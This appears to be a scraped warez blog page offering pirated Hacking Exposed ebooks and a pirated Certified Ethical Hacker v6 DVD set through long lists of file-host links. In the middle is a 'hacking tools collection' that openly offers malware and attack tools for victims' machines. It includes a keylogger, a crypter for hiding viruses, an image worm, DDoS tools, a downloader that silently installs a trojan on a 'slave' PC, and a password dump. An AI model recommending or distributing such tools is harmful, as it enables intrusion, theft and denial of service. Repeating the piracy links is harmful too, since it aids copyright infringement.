Ultimate Hacking Exposed Ebook Collection Free Download


Hacking Exposed Linux, 3rd Edition
Hacking Exposed Linux, 3rd Edition


The Latest Linux Security Solutions

This authoritative guide will help you secure your Linux network--whether you use Linux as a desktop OS, for Internet services, for telecommunications, or for wireless services. Completely rewritten the ISECOM way, Hacking Exposed Linux, Third Edition provides the most up-to-date coverage available from a large team of topic-focused experts. The book is based on the latest ISECOM security research and shows you, in full detail, how to lock out intruders and defend your Linux systems against catastrophic attacks.



* Secure Linux by using attacks and countermeasures from the latest OSSTMM research
* Follow attack techniques of PSTN, ISDN, and PSDN over Linux
* Harden VoIP, Bluetooth, RF, RFID, and IR devices on Linux
* Block Linux signal jamming, cloning, and eavesdropping attacks
* Apply Trusted Computing and cryptography tools for your best defense
* Fix vulnerabilities in DNS, SMTP, and Web 2.0 services
* Prevent SPAM, Trojan, phishing, DoS, and DDoS exploits
* Find and repair errors in C code with static analysis and Hoare Logic

--------------------------------------------------------------------------------------------------------------
Hacking Exposed Computer Forensics, Second Edition

Hacking Exposed Computer Forensics, Second Edition: Computer Forensics Secrets & Solutions


The latest strategies for investigating cyber-crime

Identify and investigate computer criminals of all stripes with help from this fully updated. real-world resource. Hacking Exposed Computer Forensics, Second Edition explains how to construct a high-tech forensic lab, collect prosecutable evidence, discover e-mail and system file clues, track wireless activity, and recover obscured documents. Learn how to re-create an attacker's footsteps, communicate with counsel, prepare court-ready reports, and work through legal and organizational challenges. Case studies straight from today's headlines cover IP theft, mortgage fraud, employee misconduct, securities fraud, embezzlement, organized crime, and consumer fraud cases.


* Effectively uncover, capture, and prepare evidence for investigation
* Store and process collected data in a highly secure digital forensic lab
* Restore deleted documents, partitions, user activities, and file systems
* Analyze evidence gathered from Windows, Linux, and Macintosh systems
* Use the latest Web and client-based e-mail tools to extract relevant artifacts
* Overcome the hacker's anti-forensic, encryption, and obscurity techniques
* Unlock clues stored in cell phones, PDAs, and Windows Mobile devices
* Prepare legal documents that will hold up to judicial and defense scrutiny
----------------------------------------------------------------------------------------------------------------------------------- 

Hacking Exposed Windows

Hacking Exposed Windows: Microsoft Windows Security Secrets and Solutions


# Establish business relevance and context for security by highlighting real-world risks
# Take a tour of the Windows security architecture from the hacker's perspective, exposing old and new vulnerabilities that can easily be avoided
# Understand how hackers use reconnaissance techniques such as footprinting, scanning, banner grabbing, DNS queries,
and Google searches to locate vulnerable Windows systems
# Learn how information is extracted anonymously from Windows using simple NetBIOS, SMB, MSRPC, SNMP, and Active Directory enumeration techniques
# Prevent the latest remote network exploits such as password grinding via WMI and Terminal Server, passive Kerberos logon sniffing,
rogue server/man-in-the-middle attacks, and cracking vulnerable services
# See up close how professional hackers reverse engineer and develop new Windows exploits
# Identify and eliminate rootkits, malware, and stealth software
# Fortify SQL Server against external and insider attacks
# Harden your clients and users against the latest e-mail phishing, spyware, adware, and Internet Explorer threats
# Deploy and configure the latest Windows security countermeasures, including BitLocker, Integrity Levels, User Account Control,
the updated Windows Firewall, Group Policy, Vista Service Refactoring/Hardening, SafeSEH, GS, DEP, Patchguard, and Address Space Layout Randomization
-----------------------------------------------------------------------------------------------------------------------------------
Hacking Exposed: Web Applications, 3rd Edition

Hacking Exposed: Web Applications, 3rd Edition By Joel Scambray, Vincent Liu, Caleb Sima MG-H, 3rd Edition 2011 | 482 Pages | ISBN: 0071740643 | PDF | 7 MB

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures 

------------------------------------------------------------------------------------------------------------------------------------
 Hacking Exposed Network Security & Solutions 6th Edition


The world's bestselling computer security book--fully expanded and updated

"Right now you hold in your hand one of the most successful security books ever written. Rather than being a sideline participant, leverage the valuable insights Hacking Exposed 6 provides to help yourself, your company, and your country fight cyber-crime." --From the Foreword by Dave DeWalt, President and CEO, McAfee, Inc.

"For security to be successful in any company, you must ‘think evil' and be attuned to your ‘real risk'...Hacking Expose 6 defines both." --Patrick Heim, CISO, Kaiser Permanente

"The definitive resource to understanding the hacking mindset and the defenses against it." --Vince Rossi, CEO & President, St. Bernard Software

"Identity theft costs billions every year and unless you understand the threat, you will be destined to be a victim of it. Hacking Exposed 6 gives you the tools you need to prevent being a victim." --Bill Loesch, CTO, Guard ID Systems

"This book is current, comprehensive, thoughtful, backed by experience, and appropriately free of vendor-bias-prized features for any security practitioner in need of information." --Kip Boyle, CISO, PEMCO Mutual Insurance Company

"The Hacking Exposed series has become the definitive reference for security professionals from the moment it was first released, and the 6th edition maintains its place on my bookshelf," --Jeff Moss, Founder of the popular Black Hat Security Conference

Meet the formidable demands of security in today's hyperconnected world with expert guidance from the world-renowned Hacking Exposed team. Following the time-tested "attack-countermeasure" philosophy, this 10th anniversary edition has been fully overhauled to cover the latest insidious weapons in the hacker's extensive arsenal.

New and updated material:

   * New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
   * Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
   * The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
   * New wireless and RFID security tools, including multilayered encryption and gateways
   * All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
   * Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
   * VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
   * Fully updated chapters on hacking the Internet user, web hacking, and securing code

Table of contents

Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivity and VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index
Biographical note

Stuart McClure, CISSP, CNE, CCSE, a leading authority on information security, is VP of Operations & Strategy for the Risk & Compliance Business Unit at McAfee.Joel Scambray, CISSP, is cofounder and CEO of Consciere, provider of strategic security advisory services.George Kurtz, CISSP, CISA, CPA, is an internationally recognized security expert, author, and entrepreneur. He is currently a senior executive and general manager with McAfee, Inc.They are the bestselling coauthors of the five previous editions of Hacking Exposed.

6 comments:

Ultimate Hacking Tools Collection (Part -I)

Hello guys i have compiled all the tools which i found very usefull for me.Please suggest me if i should add more tools and also which tools.



1 - PLAYSTATION EMULATOR -- You can play ps2 games on your pc with this utility,a very handy tool for gamers,its better than bleem in compatibility.
http://uploading.com/files/d29ba697/epsx...lator.rar/

2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.
http://uploading.com/files/14747c2e/Wind...nload.rar/

3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.
http://uploading.com/files/51cd3m24/RS%2...ECKER.rar/

4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.
http://uploading.com/files/253aaa2a/SQL%...ORIAL.rar/

5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.
http://uploading.com/files/9me23443/Ca0s...%2Bv1.rar/

6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.
http://uploading.com/files/bfaem73d/Milw...web07.zip/

7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.
http://uploading.com/files/69df2e18/Vaqx...ublic.rar/

8 - Hackers Tool Box -- Many handy tools.
http://uploading.com/files/3fm492c2/Hack...%2Bv1.rar/

9 - Nathans Image Worm -- It replaces every image on slave's pc with your defined image
http://uploading.com/files/3fe18118/Nath...BWorm.rar/

10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.

11 - JKymmel's Crypter -- For crypting you viruses.
http://uploading.com/files/e4m6514m/JKym...2B1.2.rar/

12 - Icon changer -- Change the icon of any file


  ANONYMITYTOOLS

16 - Jasager_Firmware_1.0 -- Its a Wifi MitM Tool for faking Your Access Point,it has lots of deadly features.
http://uploading.com/files/14bm1md3/jasa...0.tar.rar/

17 - Hide my windows installer -- Hides your running programs instantly
http://uploading.com/files/827m8b65/hide...aller.zip/

SECURITY TOOLS

18 - TrueCrypt Setup 6.2a -- It uses a powerfull encryption system used by government and agencies to encrypt your data.
http://uploading.com/files/d292b4a1/True...B6.2a.rar/

19 - NortOn GoBack -- This tools has saved me lots of time from serious error,this is a must have tools,it can restore your pc to exact date and time.Its 1000 times better than system restore.
http://uploading.com/files/c197mf2m/Nort...B2005.rar/

20 - Anti_keylogger_sheild_v3.0 -- Now you don't have to worry about keyloggers and stealers,very usefull to have.
http://uploading.com/files/b9daed94/Anti..._v3.0.rar/

21 - Process Explorer -- A utility for listing all the processes running.
http://uploading.com/files/a42dd34f/Pokm...lorer.rar/


REVERSE ENGINEERING TOOLS

24 - PE.Explorer for Reverse engg. -- More advanced tool for hexing.
http://uploading.com/files/461f31fe/PE.E...engg..zip/


DDOS TOOLS

26 - Ddos any site in this WWW -- Title says it all.
http://uploading.com/files/67cmb1f7/Ddos...2BWWW.rar/

27 - Site_Hog_v1 -- One of the most powerfull ddos tool.
http://uploading.com/files/e2e8f85e/Site...lease.rar/

28 - BFF DoS (Ping) v1.0 -- A good ddoser by BFF Productions
http://uploading.com/files/3838478a/BFF%...Bv1.0.rar/

30 - Secret Downloader -- Makes your slave download a trojan and run it hidden.

http://uploading.com/files/44b5eeb8/Tiny...r_V31.rar/

NEWLY ADDED TOOLS

32 - PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included

http://uploading.com/files/c723368b/PHIS...ABBER.rar/

33 - MASSIVE XXX PASSWORDS DUMP -- TITLE SAYS IT ALL
http://uploading.com/files/b422251c/MASS...BDUMP.rar/

35 - KeyScrambler -- It encrypts all the keys you presses on the keyboard thereby protecting you from keyloggers,its a very usefull tool and it works great for me.
http://uploading.com/files/311a5f23/KeyS...Setup.rar/

37 - VNC CLIENT FOR YOUR MOBILE -- A VNC Client for J2ME (Java 2 Mobile Edition)
http://uploading.com/files/8816af8f/VNC-...40519.rar/

*If you want any specific tool please let me know

13 comments:

Certified Ethical Hacker v6 Training Complete + All Laps DVD Download

Certified Ethical Hacker v6 Training



If you want to stop hackers from invading your network, first you’ve got to invade their minds.
Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks within 20 minutes.
The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits. This philosophy stems from the proven practice of trying to catch a thief, by thinking like a thief. As technology advances and organization depend on technology increasingly, information assets have evolved into critical components of survival.
If hacking involves creativity and thinking ‘out-of-the-box’, then vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organizations have adequately protected their information assets, they must adopt the approach of ‘defense in depth’. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure.
The definition of an Ethical Hacker is very similar to a Penetration Tester. The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in the United States and most other countries. When it is done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target.
The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.
To achieve the Certified Ethical Hacker Certification, you must pass the CEH exam 312-50

MEGAUPLOAD

DVD 1
http://www.megaupload.com/?d=WJMA05ZV
http://www.megaupload.com/?d=8C4MXDU5
http://www.megaupload.com/?d=JEVIK8N9
http://www.megaupload.com/?d=U6GD1WLL
http://www.megaupload.com/?d=E236PHW5
http://www.megaupload.com/?d=FQS8D87U
http://www.megaupload.com/?d=48STXW0A
http://www.megaupload.com/?d=G0SGLZ78
http://www.megaupload.com/?d=1J9SJ6FP
http://www.megaupload.com/?d=LMLUDROY
http://www.megaupload.com/?d=LJPF2LIY
http://www.megaupload.com/?d=45XI28TH
http://www.megaupload.com/?d=YN22OTE5
http://www.megaupload.com/?d=CONWEP1T
http://www.megaupload.com/?d=XZ49PRDZ
http://www.megaupload.com/?d=V7LNVLXR
http://www.megaupload.com/?d=ESYMRBKD
http://www.megaupload.com/?d=MYE7M5X2
http://www.megaupload.com/?d=LQ2E4L3F
http://www.megaupload.com/?d=83PYQ2FJ
http://www.megaupload.com/?d=BY7F9D9E
http://www.megaupload.com/?d=0F7CB4SW
http://www.megaupload.com/?d=SECJTNV8
http://www.megaupload.com/?d=4NIVW0K6
http://www.megaupload.com/?d=2TZTW8XM
http://www.megaupload.com/?d=BQT27X37
http://www.megaupload.com/?d=5NRZYDOW
http://www.megaupload.com/?d=VCR1NM0L
http://www.megaupload.com/?d=NLJ5E4IK
http://www.megaupload.com/?d=X43PWTRF
http://www.megaupload.com/?d=99GYQQWO
http://www.megaupload.com/?d=FZ0IJTHB
http://www.megaupload.com/?d=FPRXP0WT
http://www.megaupload.com/?d=78HQQ3PP
http://www.megaupload.com/?d=0MIU2MBN
http://www.megaupload.com/?d=U1NVSP4O
http://www.megaupload.com/?d=GY9K3319
http://www.megaupload.com/?d=RS5KUOEC
http://www.megaupload.com/?d=QQSKWY52
http://www.megaupload.com/?d=54VEQL5R
http://www.megaupload.com/?d=774K7H76

DVD 2
http://www.megaupload.com/?d=MLT21C3U
http://www.megaupload.com/?d=42KY3SXB
http://www.megaupload.com/?d=IC87L0IP
http://www.megaupload.com/?d=FY4UWBMC
http://www.megaupload.com/?d=IPNZTWWO
http://www.megaupload.com/?d=GO84L25S
http://www.megaupload.com/?d=QHBOCEP1
http://www.megaupload.com/?d=F403CEKN
http://www.megaupload.com/?d=M4HEUNWS
http://www.megaupload.com/?d=0FYJZ3RL
http://www.megaupload.com/?d=F85VS7AZ
http://www.megaupload.com/?d=BHZBJIX4
http://www.megaupload.com/?d=06ROVFYN
http://www.megaupload.com/?d=TB98UCR8
http://www.megaupload.com/?d=OHUEA7JZ
http://www.megaupload.com/?d=E45F9CE1
http://www.megaupload.com/?d=DYJXVMF6
http://www.megaupload.com/?d=IT3DWGQ9
http://www.megaupload.com/?d=4HL29MNO
http://www.megaupload.com/?d=XADBA8ZI
http://www.megaupload.com/?d=HEO81CJL
http://www.megaupload.com/?d=YV29FF5E
http://www.megaupload.com/?d=FTS7KWJI
http://www.megaupload.com/?d=MX7LFSHS
http://www.megaupload.com/?d=Z38Y8ONB
http://www.megaupload.com/?d=S868JPA0
http://www.megaupload.com/?d=W8FXON8A
http://www.megaupload.com/?d=A7CGNQBM
http://www.megaupload.com/?d=SB3ZE0YJ
http://www.megaupload.com/?d=48NJ0MU1
http://www.megaupload.com/?d=7WMOSEFG
http://www.megaupload.com/?d=WS10XE1M
http://www.megaupload.com/?d=ZIRPZ4US
http://www.megaupload.com/?d=O8GD4G4V
http://www.megaupload.com/?d=0CRQ3LUX
http://www.megaupload.com/?d=7GHB60H0
http://www.megaupload.com/?d=E9TV2AAC

DVD 3
http://www.megaupload.com/?d=OVCVUUKL
http://www.megaupload.com/?d=F25F9LSN
http://www.megaupload.com/?d=I871A71D
http://www.megaupload.com/?d=P23JGZII
http://www.megaupload.com/?d=CPOAGXTS
http://www.megaupload.com/?d=XOK19RWZ
http://www.megaupload.com/?d=NDBNUVQF
http://www.megaupload.com/?d=OKX9S9RW
http://www.megaupload.com/?d=RJC22B24
http://www.megaupload.com/?d=6HW73R6W
http://www.megaupload.com/?d=BYMZ5TPT
http://www.megaupload.com/?d=ZUYUTWGR
http://www.megaupload.com/?d=LUZK0AAI
http://www.megaupload.com/?d=ARZDBQYZ
http://www.megaupload.com/?d=Y3Z6YHBJ
http://www.megaupload.com/?d=UQ84L9JP
http://www.megaupload.com/?d=5ROOUKCA
http://www.megaupload.com/?d=I7L6GDO4
http://www.megaupload.com/?d=PC4MX7BP
http://www.megaupload.com/?d=KSBCN677
http://www.megaupload.com/?d=DGZF5OGI
http://www.megaupload.com/?d=TQVJY8R1
http://www.megaupload.com/?d=Q3I0U93I
http://www.megaupload.com/?d=G31NGGC0
http://www.megaupload.com/?d=1U3P0FP4
http://www.megaupload.com/?d=7A6QMJU4
http://www.megaupload.com/?d=5R22Z1RP
http://www.megaupload.com/?d=TOPK8ZFS
http://www.megaupload.com/?d=Q05ZJWG5
http://www.megaupload.com/?d=B8XEWV2Z
http://www.megaupload.com/?d=8MOGLJMP
http://www.megaupload.com/?d=ZWJBPI13
http://www.megaupload.com/?d=8DV6ZVY3
http://www.megaupload.com/?d=6BCYNLJ9
http://www.megaupload.com/?d=2LVRV0BA
http://www.megaupload.com/?d=HBO5XMXK
http://www.megaupload.com/?d=8GBH39SK

http://www.filefactory.com/file/a0f20e8/n/Career_Academy_Certified_Ethical_Hacker_V_6_DVD_3_part1_rar
http://www.filefactory.com/file/a0f20fd/n/Career_Academy_Certified_Ethical_Hacker_V_6_DVD_3_part2_rar
http://www.filefactory.com/file/a0f2h8e/n/Career_Academy_Certified_Ethical_Hacker_V_6_DVD_3_part3_rar
http://www.filefactory.com/file/a0f2b7h/n/Career_Academy_Certified_Ethical_Hacker_V_6_DVD_3_part4_rar

DVD 4
http://www.megaupload.com/?d=Y911ZQU9
http://www.megaupload.com/?d=1CDU8WVH
http://www.megaupload.com/?d=GZJ7R13K
http://www.megaupload.com/?d=1G8QKQLF
http://www.megaupload.com/?d=2ZJGTI1X
http://www.megaupload.com/?d=FAHD4AWY
http://www.megaupload.com/?d=F92GUX8R
http://www.megaupload.com/?d=OA863RV8
http://www.megaupload.com/?d=MB05XE3G
http://www.megaupload.com/?d=57J92C0G
http://www.megaupload.com/?d=PFBK35ZJ
http://www.megaupload.com/?d=02L0N514
http://www.megaupload.com/?d=JOIZNQQ6

MEDIAFIRE

DVD 1
http://www.mediafire.com/?sharekey=86eb05437783626f91b20cc0d07ba4d2ad1aab09128d2ae6
DVD 2
http://www.mediafire.com/?sharekey=86eb05437783626f91b20cc0d07ba4d280a56c67b7af8ade
DVD 3
http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d21c75a918e4e1d695
DVD 4
http://www.mediafire.com/?qyxlbbmzzoz
http://www.mediafire.com/?ewptkvwjjsb
http://www.mediafire.com/?wd0pqdhp0dm
http://www.mediafire.com/?yojymmdj9u0
http://www.mediafire.com/?11soyyfi0bg
http://www.mediafire.com/?h0ztj0pm0sb
http://www.mediafire.com/?ybbn3dydlnm
http://www.mediafire.com/?jhkpkd0veiz
http://www.mediafire.com/?et9smil0vod
http://www.mediafire.com/?wdan234s2fy
http://www.mediafire.com/?mzasjj2icyl
http://www.mediafire.com/?g0ndietlmvt
http://www.mediafire.com/?itcexdmjzbx

DVD 5

http://rapidshare.com/files/290451346/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part1.rar
http://rapidshare.com/files/290464777/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part2.rar
http://rapidshare.com/files/290469238/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part3.rar
http://rapidshare.com/files/290480762/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part4.rar
http://rapidshare.com/files/290485652/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part5.rar
http://rapidshare.com/files/290498832/Career_Academy_Certified_Ethical_Hacker_V.6_DVD_5.part6.rar


DVD 6 NEW/NUEVO AND/Y LAST/ULTIMO DVD

http://depositfiles.com/files/68ec00qyb

Si pide Pass es: abu137

LABs DVD-1


http://rapidshare.com/files/290755734/CEHv6-Labs-Volume-1.part01.rar
http://rapidshare.com/files/290755610/CEHv6-Labs-Volume-1.part02.rar
http://rapidshare.com/files/290779521/CEHv6-Labs-Volume-1.part03.rar
http://rapidshare.com/files/290779675/CEHv6-Labs-Volume-1.part04.rar
http://rapidshare.com/files/290803786/CEHv6-Labs-Volume-1.part05.rar
http://rapidshare.com/files/290804651/CEHv6-Labs-Volume-1.part06.rar
http://rapidshare.com/files/290826761/CEHv6-Labs-Volume-1.part07.rar
http://rapidshare.com/files/290827289/CEHv6-Labs-Volume-1.part08.rar
http://rapidshare.com/files/290845845/CEHv6-Labs-Volume-1.part09.rar
http://rapidshare.com/files/290846285/CEHv6-Labs-Volume-1.part10.rar
http://rapidshare.com/files/290863639/CEHv6-Labs-Volume-1.part11.rar
http://rapidshare.com/files/290863790/CEHv6-Labs-Volume-1.part12.rar
http://rapidshare.com/files/290896006/CEHv6-Labs-Volume-1.part13.rar
http://rapidshare.com/files/290895739/CEHv6-Labs-Volume-1.part14.rar
http://rapidshare.com/files/290909872/CEHv6-Labs-Volume-1.part15.rar
http://rapidshare.com/files/290910257/CEHv6-Labs-Volume-1.part16.rar
http://rapidshare.com/files/290923408/CEHv6-Labs-Volume-1.part17.rar
http://rapidshare.com/files/290923473/CEHv6-Labs-Volume-1.part18.rar
http://rapidshare.com/files/290933528/CEHv6-Labs-Volume-1.part19.rar
http://rapidshare.com/files/290933030/CEHv6-Labs-Volume-1.part20.rar
http://rapidshare.com/files/290933664/CEHv6-Labs-Volume-1.part21.rar

http://www.filefactory.com/file/a0gg710/n/CEHv6-Labs-Volume-1_part01_rar
http://www.filefactory.com/file/a0ghbgg/n/CEHv6-Labs-Volume-1_part02_rar
http://www.filefactory.com/file/a0g0h8h/n/CEHv6-Labs-Volume-1_part03_rar
http://www.filefactory.com/file/a0g0hf7/n/CEHv6-Labs-Volume-1_part04_rar
http://www.filefactory.com/file/a0gh083/n/CEHv6-Labs-Volume-1_part05_rar
http://www.filefactory.com/file/a0g0h58/n/CEHv6-Labs-Volume-1_part06_rar
http://www.filefactory.com/file/a0g0h89/n/CEHv6-Labs-Volume-1_part07_rar
http://www.filefactory.com/file/a0f7aa9/n/CEHv6-Labs-Volume-1_part08_rar
http://www.filefactory.com/file/a0f7a4f/n/CEHv6-Labs-Volume-1_part09_rar
http://www.filefactory.com/file/a0f7ag3/n/CEHv6-Labs-Volume-1_part10_rar
http://www.filefactory.com/file/a0f7ce1/n/CEHv6-Labs-Volume-1_part11_rar
http://www.filefactory.com/file/a0f70hf/n/CEHv6-Labs-Volume-1_part12_rar
http://www.filefactory.com/file/a0g0383/n/CEHv6-Labs-Volume-1_part13_rar
http://www.filefactory.com/file/a0f7367/n/CEHv6-Labs-Volume-1_part14_rar
http://www.filefactory.com/file/a0g04cb/n/CEHv6-Labs-Volume-1_part15_rar
http://www.filefactory.com/file/a0f79f1/n/CEHv6-Labs-Volume-1_part16_rar
http://www.filefactory.com/file/a0f8e45/n/CEHv6-Labs-Volume-1_part17_rar
http://www.filefactory.com/file/a0f80hc/n/CEHv6-Labs-Volume-1_part18_rar
http://www.filefactory.com/file/a0f897g/n/CEHv6-Labs-Volume-1_part19_rar
http://www.filefactory.com/file/a0f9gcf/n/CEHv6-Labs-Volume-1_part20_rar
http://www.filefactory.com/file/a0f9hhb/n/CEHv6-Labs-Volume-1_part21_rar

LABs DVD-2

http://rapidshare.com/files/290943538/CEHv6-Labs-Volume-2.part01.rar
http://rapidshare.com/files/290943871/CEHv6-Labs-Volume-2.part02.rar
http://rapidshare.com/files/290954094/CEHv6-Labs-Volume-2.part03.rar
http://rapidshare.com/files/290954124/CEHv6-Labs-Volume-2.part04.rar
http://rapidshare.com/files/290963546/CEHv6-Labs-Volume-2.part05.rar
http://rapidshare.com/files/290963560/CEHv6-Labs-Volume-2.part06.rar
http://rapidshare.com/files/290973187/CEHv6-Labs-Volume-2.part07.rar
http://rapidshare.com/files/290972917/CEHv6-Labs-Volume-2.part08.rar
http://rapidshare.com/files/290982353/CEHv6-Labs-Volume-2.part09.rar
http://rapidshare.com/files/290982508/CEHv6-Labs-Volume-2.part10.rar
http://rapidshare.com/files/290992044/CEHv6-Labs-Volume-2.part11.rar
http://rapidshare.com/files/290992920/CEHv6-Labs-Volume-2.part12.rar
http://rapidshare.com/files/291002697/CEHv6-Labs-Volume-2.part13.rar
http://rapidshare.com/files/291003865/CEHv6-Labs-Volume-2.part14.rar
http://rapidshare.com/files/291015120/CEHv6-Labs-Volume-2.part15.rar
http://rapidshare.com/files/291016593/CEHv6-Labs-Volume-2.part16.rar
http://rapidshare.com/files/291027496/CEHv6-Labs-Volume-2.part17.rar
http://rapidshare.com/files/291029425/CEHv6-Labs-Volume-2.part18.rar
http://rapidshare.com/files/291028252/CEHv6-Labs-Volume-2.part19.rar
http://rapidshare.com/files/291028271/CEHv6-Labs-Volume-2.sfv

http://www.filefactory.com/file/a0f9440/n/CEHv6-Labs-Volume-2_part01_rar
http://www.filefactory.com/file/a0f99a4/n/CEHv6-Labs-Volume-2_part02_rar
http://www.filefactory.com/file/a0gah66/n/CEHv6-Labs-Volume-2_part03_rar
http://www.filefactory.com/file/a0ga757/n/CEHv6-Labs-Volume-2_part04_rar
http://www.filefactory.com/file/a0gbdhe/n/CEHv6-Labs-Volume-2_part05_rar
http://www.filefactory.com/file/a0gb108/n/CEHv6-Labs-Volume-2_part06_rar
http://www.filefactory.com/file/a0gb8g0/n/CEHv6-Labs-Volume-2_part07_rar
http://www.filefactory.com/file/a0gce81/n/CEHv6-Labs-Volume-2_part08_rar
http://www.filefactory.com/file/a0gc38a/n/CEHv6-Labs-Volume-2_part09_rar
http://www.filefactory.com/file/a0gc808/n/CEHv6-Labs-Volume-2_part10_rar
http://www.filefactory.com/file/a0gc9ge/n/CEHv6-Labs-Volume-2_part11_rar
http://www.filefactory.com/file/a0gdb36/n/CEHv6-Labs-Volume-2_part12_rar
http://www.filefactory.com/file/a0gddaf/n/CEHv6-Labs-Volume-2_part13_rar
http://www.filefactory.com/file/a0gde7h/n/CEHv6-Labs-Volume-2_part14_rar
http://www.filefactory.com/file/a0gdf94/n/CEHv6-Labs-Volume-2_part15_rar
http://www.filefactory.com/file/a0gd0hh/n/CEHv6-Labs-Volume-2_part16_rar
http://www.filefactory.com/file/a0gd3f1/n/CEHv6-Labs-Volume-2_part17_rar
http://www.filefactory.com/file/a0gd5d5/n/CEHv6-Labs-Volume-2_part18_rar
http://www.filefactory.com/file/a0gd5e2/n/CEHv6-Labs-Volume-2_part19_rar
http://www.filefactory.com/file/a0gd5e1/n/CEHv6-Labs-Volume-2_sfv

LABs DVD-3


http://rapidshare.com/files/291042892/CEHv6-Labs-Volume-3.part01.rar
http://rapidshare.com/files/291044140/CEHv6-Labs-Volume-3.part02.rar
http://rapidshare.com/files/291056992/CEHv6-Labs-Volume-3.part03.rar
http://rapidshare.com/files/291057666/CEHv6-Labs-Volume-3.part04.rar
http://rapidshare.com/files/291072363/CEHv6-Labs-Volume-3.part05.rar
http://rapidshare.com/files/291073069/CEHv6-Labs-Volume-3.part06.rar
http://rapidshare.com/files/291086715/CEHv6-Labs-Volume-3.part07.rar
http://rapidshare.com/files/291087092/CEHv6-Labs-Volume-3.part08.rar
http://rapidshare.com/files/291100866/CEHv6-Labs-Volume-3.part09.rar
http://rapidshare.com/files/291100942/CEHv6-Labs-Volume-3.part10.rar
http://rapidshare.com/files/291114867/CEHv6-Labs-Volume-3.part11.rar
http://rapidshare.com/files/291114981/CEHv6-Labs-Volume-3.part12.rar
http://rapidshare.com/files/291128914/CEHv6-Labs-Volume-3.part13.rar
http://rapidshare.com/files/291129203/CEHv6-Labs-Volume-3.part14.rar
http://rapidshare.com/files/291141851/CEHv6-Labs-Volume-3.part15.rar
http://rapidshare.com/files/291142169/CEHv6-Labs-Volume-3.part16.rar
http://rapidshare.com/files/291156953/CEHv6-Labs-Volume-3.part17.rar
http://rapidshare.com/files/291157340/CEHv6-Labs-Volume-3.part18.rar
http://rapidshare.com/files/291171719/CEHv6-Labs-Volume-3.part19.rar
http://rapidshare.com/files/291169494/CEHv6-Labs-Volume-3.part20.rar
http://rapidshare.com/files/291169512/CEHv6-Labs-Volume-3.sfv


LABs_ DVD-4


http://rapidshare.com/files/291185072/CEHv6-Labs-Volume-4.part1.rar
http://rapidshare.com/files/291186944/CEHv6-Labs-Volume-4.part2.rar
http://rapidshare.com/files/291200152/CEHv6-Labs-Volume-4.part3.rar
http://rapidshare.com/files/291201890/CEHv6-Labs-Volume-4.part4.rar
http://rapidshare.com/files/291215621/CEHv6-Labs-Volume-4.part5.rar
http://rapidshare.com/files/291217771/CEHv6-Labs-Volume-4.part6.rar
